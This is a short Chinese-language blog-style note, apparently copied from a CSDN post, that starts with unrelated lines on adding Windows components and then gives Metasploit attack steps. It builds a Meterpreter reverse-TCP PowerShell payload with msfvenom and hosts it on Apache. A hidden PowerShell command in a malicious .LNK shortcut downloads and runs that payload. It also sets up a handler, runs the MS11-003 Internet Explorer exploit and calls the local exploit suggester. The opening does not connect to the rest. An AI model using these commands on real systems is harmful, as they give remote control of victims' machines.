组件一般都是系统自带都有的, 如:WINXP
或WIN2000
它本身,就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。
具体方式:
控制面板--添加或删除程序--添加/删除组件
Windows系统使用二进制解析 .LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执行,由于是在explorer.exe进程中运行,所以 load 进内存时与当前用户具有相同权限
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=5555 -f psh-reflection>/opt/search.ps1 #生成shell反弹木马
mv search.ps1 /var/www/html #木马移动到/var/www/html
service apache2 start #启动服务
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.102/search.ps1');test.ps1" #创建快捷件远程加载
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.102
set lport 5555
exploit
溢出漏洞是由于程序中的某个或某些输入函数(使用者输入参数)对所接收数据的边界验证不严密而造成。 根据程序执行中堆栈调用原理,程序对超出边界的部分如果没有经过验证自动去掉,那么超出边界的部分就会覆盖后面的存放程序指针的数据,当执行完上面的代码,程序会自动调用指针所指向地址的命令。
search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set srvhost
set lhost 192.168.0.102
set uripath 00
Run
sessions
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.0.102
set SESSION 1
Exploit
https://blog.csdn.net/PigLL/article/details/108012981